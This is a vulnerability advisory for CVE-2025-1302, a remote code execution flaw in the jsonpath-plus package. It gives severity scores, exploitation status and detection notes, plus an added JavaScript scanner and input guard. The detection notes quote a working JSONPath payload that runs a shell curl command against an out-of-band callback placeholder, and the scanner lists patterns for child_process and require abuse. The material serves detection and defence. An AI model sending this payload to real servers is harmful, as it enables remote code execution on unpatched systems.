CVE-2025-1302
published 2025-02-15


Priority: P1 (85) · Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
In the wild: VulnCheck KEV (Initial access) · Exploited in the wild
EPSS: 10.70% (95.3rd percentile)
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of `eval='safe'` mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).

Detection & IOCs (extracted from sources)

Command (JSONPath filter payload, `{{interactsh-url}}` is the out-of-band callback placeholder): `$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]`
  • Exploit targets common JSON query endpoints via HTTP POST with Content-Type: application/json. Monitor POST requests to /query, /jsonpath, /api/query, /data, /parse, /filter, /expression containing JSONPath filter expressions with constructor references.
  • Successful exploitation can be confirmed via out-of-band DNS/HTTP callback (interactsh). Monitor for unexpected outbound DNS or HTTP requests originating from the Node.js process after processing JSONPath queries.
  • The vulnerability exploits the unsafe default `eval='safe'` mode in jsonpath-plus. Audit all deployments of jsonpath-plus for versions before 10.3.0 and check if user-controlled input is passed to JSONPath evaluation.
  • Payload leverages `this.process.mainModule.require('child_process')` to spawn OS commands. Alert on Node.js child_process spawning from within JSONPath evaluation contexts.
  • Red Hat downgraded impact to low for their products because no exploitable code paths exist in affected Red Hat products, and in OpenShift AI the jsonpath-plus dependency is never loaded.
  • In Red Hat OpenShift AI, jsonpath-plus is a transitive dependency and the direct dependency's feature that requires it is not used, meaning the vulnerable code is never loaded.
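The following is an added example, not code from jsonpath-plus, Snyk, Red Hat or the Nuclei template above. It does two things: it shows why the published payload reaches `Function` (`[['constructor']]` is an array that coerces to the property key `"constructor"`, so `''[['constructor']][['constructor']]` is the `Function` constructor, which then compiles the string `p`), and it implements the detection guidance from the list above as a request scanner plus an application-side guard. The endpoint list is the one named in the detection notes; the indicator regexes, the `isSimpleJsonPath` allowlist grammar and the sample requests are my own assumptions and constructed data. The guard is a defence-in-depth check, not a substitute for upgrading to 10.3.0 or later.

```javascript
// Added example for CVE-2025-1302 detection (not jsonpath-plus or advisory code).
// Sample requests and the indicator list are constructed for this illustration.

// 1. The gadget chain from the published payload. Nothing is executed here: we only
//    resolve the two property lookups to show that the chain yields Function.
function gadgetResolvesToFunction() {
  const strCtor = ''[['constructor']];      // ['constructor'] coerces to "constructor" -> String
  const fnCtor = strCtor[['constructor']];  // String.constructor -> Function
  return fnCtor === Function;
}

// 2. Request scanner. Endpoints are the ones listed in the detection notes above;
//    the indicator regexes are assumptions, not a published rule set.
const QUERY_ENDPOINTS = new Set([
  '/query', '/jsonpath', '/api/query', '/data', '/parse', '/filter', '/expression',
]);
const INDICATORS = [
  ['constructor-ref', /constructor/],
  ['script-filter', /\?\s*\(/],           // ?( ... ) filter expression
  ['process-access', /\bprocess\b/],
  ['child_process', /child_process/],
  ['require-call', /\brequire\s*\(/],
  ['mainModule', /mainModule/],
];

// Collect every string value in a parsed JSON body; JSONPath expressions arrive as strings.
function collectStrings(value, out = []) {
  if (typeof value === 'string') out.push(value);
  else if (Array.isArray(value)) value.forEach((v) => collectStrings(v, out));
  else if (value && typeof value === 'object') Object.values(value).forEach((v) => collectStrings(v, out));
  return out;
}

// req = { method, path, contentType, body } with body as raw text.
// Returns the sorted list of indicator names that matched (empty when nothing did).
function scanRequest(req) {
  if (req.method !== 'POST' || !QUERY_ENDPOINTS.has(req.path)) return [];
  if (!/^application\/json/i.test(req.contentType || '')) return [];
  let parsed;
  try { parsed = JSON.parse(req.body); } catch { return ['unparseable-json']; }
  const hits = new Set();
  for (const s of collectStrings(parsed)) {
    if (!s.includes('$')) continue;          // not a JSONPath expression
    for (const [name, re] of INDICATORS) if (re.test(s)) hits.add(name);
  }
  return [...hits].sort();
}

// 3. Application-side guard (assumed allowlist grammar): accept only $, dot or
//    recursive-descent member access, wildcards, numeric or quoted-string indices.
//    Any parenthesis, and therefore any ?() script filter, is rejected before the
//    path reaches JSONPath().
const SIMPLE_PATH = /^\$(\.\.?(\*|[A-Za-z_$][\w$]*)|(\.\.)?\[(\*|\d+|'[^'\\]*'|"[^"\\]*")\])*$/;
function isSimpleJsonPath(path) {
  return typeof path === 'string' && SIMPLE_PATH.test(path);
}

// Constructed samples. PAYLOAD is the filter expression quoted in the IOC list above.
const PAYLOAD = '$..[?(p="console.log(this.process.mainModule.require(\'child_process\')'
  + '.execSync(\'curl {{interactsh-url}}\').toString())";'
  + 'Ethan=\'\'[[\'constructor\']][[\'constructor\']](p);Ethan())]';
const SAMPLES = [
  { method: 'POST', path: '/api/query', contentType: 'application/json',
    body: JSON.stringify({ path: PAYLOAD }) },
  { method: 'POST', path: '/api/query', contentType: 'application/json',
    body: JSON.stringify({ path: '$.store.book[*].author' }) },
  { method: 'GET', path: '/api/query', contentType: 'application/json',
    body: JSON.stringify({ path: PAYLOAD }) },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log('gadget resolves to Function:', gadgetResolvesToFunction());
  for (const s of SAMPLES) console.log(s.method, s.path, scanRequest(s));
  console.log('guard accepts benign path:', isSimpleJsonPath('$.store.book[*].author'));
  console.log('guard accepts payload:', isSimpleJsonPath(PAYLOAD));
}
```

The scanner only looks at strings containing `$` inside JSON bodies, so it keys on JSONPath-shaped input rather than on every occurrence of the word `constructor`; tune the endpoint set to the routes your application actually exposes. The guard deliberately rejects legitimate but rarely needed constructs such as `[(@.length-1)]` because anything that turns on expression evaluation is exactly the surface this CVE abuses.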

CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v4.0 | 8.9 | HIGH | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| ghsa | | 9.8 | CRITICAL | |
| osv | | 9.8 | CRITICAL | |
| vulncheck | | 9.8 | CRITICAL | |
| vendor_redhat | | 9.8 | CRITICAL | |